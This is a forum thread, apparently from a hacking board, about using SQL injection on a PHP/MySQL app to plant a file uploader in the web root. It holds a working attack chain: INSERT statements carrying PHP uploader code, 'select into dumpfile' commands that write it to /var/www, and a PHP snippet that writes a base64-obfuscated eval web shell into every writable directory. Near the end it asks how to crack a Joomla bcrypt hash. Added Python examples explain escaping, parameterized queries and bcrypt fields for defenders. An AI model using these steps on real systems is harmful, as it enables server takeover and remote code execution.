MySQL problem with inserting PHP code into DB


Posted

Hi to all !

I'm testing a vulnerable app on localhost and trying to insert PHP upload-form code into a DB table, but it gives me a MySQL syntax error every time I try.

This HTML form was successfully inserted into the DB via SQLmap:

insert into userform values ('<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> 
<head>Upload File</head>
<body>
<form enctype="multipart/form-data" action="uploader.php" method="POST">
<input type="hidden" name="MAX_FILE_SIZE" value="100000" />
Choose a file to upload: <input name="uploadedfile" type="file" /><br />
<input type="submit" value="Upload File" />
</form>
</body>
</html>');

but this one gives me an SQL syntax error at line 1 every time I try to insert it into the DB:

insert into user_upload values ('
<?php
$target_path = '/var/www/';

$target_path = $target_path . basename( $_FILES['uploadedfile']['name']); 

if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path)) {
    echo "The file ".  basename( $_FILES['uploadedfile']['name']). 
    " has been uploaded";
} else{
    echo "There was an error uploading the file, please try again!";
}
?>');

Where is the problem?

I forgot to mention that the DB tables are already created in the DB exploitdb.

Posted

You have a quoted string which you are breaking out of with the quotes in the lines you are injecting. Try changing all the quotes in the string to double quotes and the outside ones to single.

Sounds like an interesting vulnerability where you can pull a contents from a database and get them executed.

Posted

Yeah, it's single quotes, but why then was the first form (the HTML form) inserted successfully into the DB while the second gives me an SQL error? Can you change the quotes and then try to insert it into the DB table again?

Posted

The way SQL works is that when you want to put a string in a column, you say:

insert into table (column_name) values ('THE_DATA_TO_INSERT');

Note that the data to insert into column_name is delimited by the single quotes. When that THE_DATA_TO_INSERT itself contains single quotes, you need to escape them either by preceding each single quote with a slash (\') or, because HTML allows you to do this, use a double quote (") instead of the single quote character in your data.
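The quoting rule above is why the HTML form (double quotes only) inserted cleanly while the PHP snippet (single quotes inside a single-quoted literal) did not. The following is an added example, not code from the thread: it uses Python's built-in sqlite3 as a stand-in for MySQL, builds the INSERT by string concatenation the way the first post does, and then shows the two fixes a defender would actually use: a parameterized query (the driver quotes the value) or standard `''` escaping. The table name and both snippets are constructed for the demo.

```python
import sqlite3

# Constructed samples modelled on the thread: the HTML form contains only
# double quotes; the PHP snippet contains single quotes.
HTML_SNIPPET = '<form enctype="multipart/form-data" action="uploader.php" method="POST">'
PHP_SNIPPET = """<?php
$target_path = '/var/www/';
echo 'done';
?>"""


def fresh_db():
    """In-memory SQLite database with a one-column table (stand-in for MySQL)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("create table user_upload (body text)")
    return conn


def naive_insert(conn, text):
    """Concatenate the value into the statement, exactly as the thread does.
    Returns the database error message if the statement fails, else None."""
    sql = "insert into user_upload values ('" + text + "');"
    try:
        conn.execute(sql)
        return None
    except sqlite3.Error as exc:
        # Any single quote inside `text` closes the literal early and the
        # remainder is parsed as SQL, which is the "syntax error at line 1".
        return str(exc)


def parameterized_insert(conn, text):
    """Bind the value as a parameter; the driver handles quoting, so embedded
    quotes can never terminate the literal. Returns what was stored."""
    conn.execute("insert into user_upload values (?)", (text,))
    return conn.execute("select body from user_upload").fetchone()[0]


def escaped_literal(text):
    """Standard SQL escaping: double every single quote inside the literal.
    (MySQL also accepts backslash escapes, as the reply notes; '' works in both.)"""
    return "'" + text.replace("'", "''") + "'"


def escaped_insert(conn, text):
    """Manual escaping; only appropriate when parameters are unavailable."""
    conn.execute("insert into user_upload values (" + escaped_literal(text) + ")")
    return conn.execute("select body from user_upload").fetchone()[0]


def demo():
    """Returns (html_naive_ok, php_naive_failed, php_param_roundtrip, php_escaped_roundtrip)."""
    return (
        naive_insert(fresh_db(), HTML_SNIPPET) is None,
        naive_insert(fresh_db(), PHP_SNIPPET) is not None,
        parameterized_insert(fresh_db(), PHP_SNIPPET) == PHP_SNIPPET,
        escaped_insert(fresh_db(), PHP_SNIPPET) == PHP_SNIPPET,
    )


if __name__ == "__main__":
    print(demo())
```

The parameterized form is the one to keep in application code: it is what stops user-supplied text from being interpreted as SQL in the first place, which is the same weakness the thread is exercising from the other side.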

Posted

If you look at the syntax highlighted code you've provided you'll see that in the first example all that is being inserted is green meaning it is all considered a single string, in the second example where the single quotes are closed early the text changes to black then back to green where the single quotes open again.

Posted

If you look at the syntax highlighted code you've provided you'll see that in the first example all that is being inserted is green meaning it is all considered a single string, in the second example where the single quotes are closed early the text changes to black then back to green where the single quotes open again.

So in fact, if I change the "black-highlighted text" to " ", it will be OK?

insert into user_upload values ('
<?php
$target_path = "/var/www/";

$target_path = $target_path . basename( $_FILES["uploadedfile"]["name"]); 

if(move_uploaded_file($_FILES["uploadedfile"]["tmp_name"], $target_path)) {
    echo "The file ".  basename( $_FILES["uploadedfile"]["name"]). 
    " has been uploaded";
} else{
    echo "There was an error uploading the file, please try again!";
}
?>');

Posted

That looks ok, try it and see.

What are you exploiting, I'm curious about what vulnerability pulls code from a database and executes it

Posted

Yeah, the SQL-inserted code sits in the DB table and then executes as an evil PHP uploader.

Grab the content from the SQL table and dump it to a .php file using these commands:

select * into dumpfile '/var/www/uploadform.php' from userform;

select * into dumpfile '/var/www/uploader.php' from user_upload;


After that, simply execute uploadform.php and upload your favourite shell onto the host. Thanks for everything, guys. :)

Posted

That makes sense, I was thinking it was executing from the database.

If you've got file write permissions you've probably also got read permissions if you've not checked that already.

Posted

Or have local file inclusion.

I tend to look for file upload features on sites which allow uploads into the document root, usually folders called userdata or uploads; they are writable when the rest isn't.

Posted

Which distro uses /var/www for this though? On my Gentoo's Apache install the root folder is /var/www/<hostname>/htdocs for instance.

Posted

I'll provide some of my exciting automation :-p

This little snippet will recursively scan directories for writable permissions and then write a small shell...

If you have PHP execution, phpinfo(); then try eval(code below);

Careful, this may write a few thousand shells to your hard drive :-)

chdir('../');
$path = realpath(getcwd());
$objects = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($path), RecursiveIteratorIterator::SELF_FIRST);
foreach($objects as $name => $object){
        if (is_dir($name)) {
                if (is_writable($name))  {
                        echo $name . ' ';
                        file_put_contents($name. '/tmp.php', base64_decode("PD9ldmFsKGJhc2U2NF9kZWNvZGUoJF9HRVRbY214eXpdKSk7Pz4="));
                }
        }
}

Posted

^^ Thanks for the script. It's very useful for finding writable folders. I don't want to open a new thread; does anyone know why this Joomla hash is very long compared with the other hashes in the DB?

$2y$10$bTQfeWF8vHD3BJ/RvoMm4uLWBD02O/YPQN9Y0NfiRlHyHlmD1FmB.

How to crack this one?

Posted

Fields are separated by the $ character.

2y means "The most secure version of Blowfish"

10 is the amount of blowfish iterations.

The remainder is the blowfish hash where I suspect the bit up to the slash is the salt and the remainder the actual hash value.
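As an added example (not from the thread), here is how the `$`-separated fields of a bcrypt string break down in practice, using the hash quoted above. The format is fixed: a version tag (`2a`, `2b`, `2x` or `2y`), a two-digit cost exponent, then a 22-character salt immediately followed by a 31-character digest, both in bcrypt's own `./A-Za-z0-9` alphabet, for 60 characters in total. That is why it is much longer than a 32-character hex MD5 value. The `identify` helper and the MD5 sample are constructed for the example; the threshold in `cost_is_acceptable` is an assumed policy value, not a standard.

```python
import hashlib
import re

# Hash string quoted in the thread (Joomla stores PHP password_hash() output).
JOOMLA_HASH = "$2y$10$bTQfeWF8vHD3BJ/RvoMm4uLWBD02O/YPQN9Y0NfiRlHyHlmD1FmB."

# Constructed sample of a plain hex MD5 digest, for comparison only.
LEGACY_MD5_SAMPLE = hashlib.md5(b"constructed example").hexdigest()

# version $ cost $ salt(22) digest(31), all in bcrypt's ./A-Za-z0-9 alphabet.
BCRYPT_RE = re.compile(r"^\$(2[abxy])\$(\d{2})\$([./A-Za-z0-9]{22})([./A-Za-z0-9]{31})$")
MD5_HEX_RE = re.compile(r"^[0-9a-f]{32}$")


def parse_bcrypt(h):
    """Split a bcrypt string into its fields; raises ValueError if it is not one."""
    m = BCRYPT_RE.match(h)
    if not m:
        raise ValueError("not a bcrypt string")
    version, cost, salt, digest = m.groups()
    cost = int(cost)
    return {
        "version": version,
        "cost": cost,
        # The cost is an exponent: the key setup runs 2**cost times.
        "rounds": 2 ** cost,
        "salt": salt,
        "digest": digest,
        "length": len(h),
    }


def identify(h):
    """Rough classification of a stored password value by shape."""
    if BCRYPT_RE.match(h):
        return "bcrypt"
    if MD5_HEX_RE.match(h):
        return "md5"
    return "unknown"


def cost_is_acceptable(h, minimum=10):
    """Defender's check: is the work factor at or above the assumed policy minimum?
    Each +1 on the cost doubles the time per guess for everyone, attacker included."""
    return parse_bcrypt(h)["cost"] >= minimum


if __name__ == "__main__":
    for k, v in parse_bcrypt(JOOMLA_HASH).items():
        print(f"{k:>8}: {v}")
    print(identify(LEGACY_MD5_SAMPLE), identify(JOOMLA_HASH))
```

For an auditor the useful output is the cost field: a store full of cost-10 bcrypt strings is in a different risk class from one holding unsalted MD5, and raising the cost is a configuration change rather than a code change in most frameworks.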
